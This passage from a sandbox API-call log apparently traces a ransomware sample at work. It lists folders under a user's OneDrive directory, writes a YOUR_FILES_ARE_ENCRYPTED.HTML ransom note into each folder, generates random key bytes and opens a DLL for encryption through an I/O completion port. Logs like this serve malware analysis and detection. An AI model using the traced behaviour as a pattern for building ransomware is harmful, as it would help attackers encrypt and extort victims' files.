"c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\si-lk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.862] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.862] CloseHandle (hObject=0x310) returned 1 [0113.863] GetProcessHeap () returned 0x600000 [0113.863] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.863] GetProcessHeap () returned 0x600000 [0113.863] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.864] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a6f8a85, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a6f8a85, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a6f8a85, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sk", cAlternateFileName="")) returned 1 [0113.864] StrStrIW (lpFirst="sk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.864] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sk") returned 78 [0113.864] GetProcessHeap () returned 0x600000 [0113.865] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.865] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sk" [0113.865] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sk\\*" [0113.865] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a6f8a85, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a6f8a85, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a9cd754, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.866] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a6f8a85, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a6f8a85, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a9cd754, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="..", cAlternateFileName="")) returned 1 [0113.866] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9cd754, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a9cd754, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2adf0c02, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.866] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.866] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sk\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.866] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.866] lstrlenW (lpString=".mui") returned 4 [0113.866] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.866] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9cd754, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a9cd754, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2adf0c02, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.866] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.866] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.866] GetProcessHeap () returned 0x600000 [0113.866] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\sk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.867] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.868] CloseHandle (hObject=0x310) returned 1 [0113.868] GetProcessHeap () returned 0x600000 [0113.868] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.868] GetProcessHeap () returned 0x600000 [0113.868] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.869] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af21d74, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2af21d74, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2af21d74, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sl", cAlternateFileName="")) returned 1 [0113.869] StrStrIW (lpFirst="sl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.869] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sl") returned 78 [0113.869] GetProcessHeap () returned 0x600000 [0113.869] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.870] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sl" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sl") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sl" [0113.870] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sl\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sl\\*" [0113.870] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sl\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af21d74, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2af21d74, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2b458fec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.870] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af21d74, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2af21d74, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2b458fec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="..", cAlternateFileName="")) returned 1 [0113.870] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b458fec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b458fec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2b8d1654, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.871] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.871] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sl\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.871] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.871] lstrlenW (lpString=".mui") returned 4 [0113.871] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.871] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b458fec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b458fec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2b8d1654, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.871] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.871] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.871] GetProcessHeap () returned 0x600000 [0113.871] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\sl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.872] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.872] CloseHandle (hObject=0x310) returned 1 [0113.873] GetProcessHeap () returned 0x600000 [0113.873] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.873] GetProcessHeap () returned 0x600000 [0113.873] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.873] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b969f9e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b969f9e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2b969f9e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sq", cAlternateFileName="")) returned 1 [0113.873] StrStrIW (lpFirst="sq", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.873] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sq") returned 78 [0113.873] GetProcessHeap () returned 0x600000 [0113.873] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.873] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sq" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sq") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sq" [0113.873] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sq", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sq\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sq\\*" [0113.873] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sq\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b969f9e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b969f9e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2bc64f47, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.873] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b969f9e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b969f9e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2bc64f47, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="..", cAlternateFileName="")) returned 1 [0113.873] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bc64f47, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2bc64f47, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2c043349, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.874] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.874] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sq\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.874] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.874] lstrlenW (lpString=".mui") returned 4 [0113.874] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.874] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bc64f47, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2bc64f47, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2c043349, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfd1a4c35, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.874] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.874] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sq\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.874] GetProcessHeap () returned 0x600000 [0113.874] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sq\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\sq\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.874] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.875] CloseHandle (hObject=0x310) returned 1 [0113.875] GetProcessHeap () returned 0x600000 [0113.875] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.875] GetProcessHeap () returned 0x600000 [0113.875] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.875] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x214b780e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x214b780e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x22a78c0e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x2ff40, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0113.875] StrStrIW (lpFirst="sqmapi.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.875] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sqmapi.dll") returned 86 [0113.875] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0113.875] lstrlenW (lpString=".dll") returned 4 [0113.875] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0113.875] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sqmapi.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\sqmapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0113.876] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=196416) returned 1 [0113.876] GetProcessHeap () returned 0x600000 [0113.876] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.877] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="48") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="6E") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="F5") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="E5") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="F9") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="4A") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="F4") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="55") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="FE") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="9A") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="48") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="FD") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="B0") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="74") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="C3") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="73") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="48") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="9A") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="A0") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="1A") returned 2 [0113.877] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="E3") returned 2 [0113.878] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="A0") returned 2 [0113.878] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="11") returned 2 [0113.878] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="75") returned 2 [0113.878] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="01") returned 2 [0113.878] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="53") returned 2 [0113.878] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="F8") returned 2 [0113.878] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="9A") returned 2 [0113.878] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="81") returned 2 [0113.878] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="A2") returned 2 [0113.878] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="D2") returned 2 [0113.878] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="3E") returned 2 [0113.878] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sqmapi.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sqmapi.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sqmapi.dll" [0113.878] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.878] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.878] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x237ffd48, ftCreationTime.dwHighDateTime=0x1d70074, 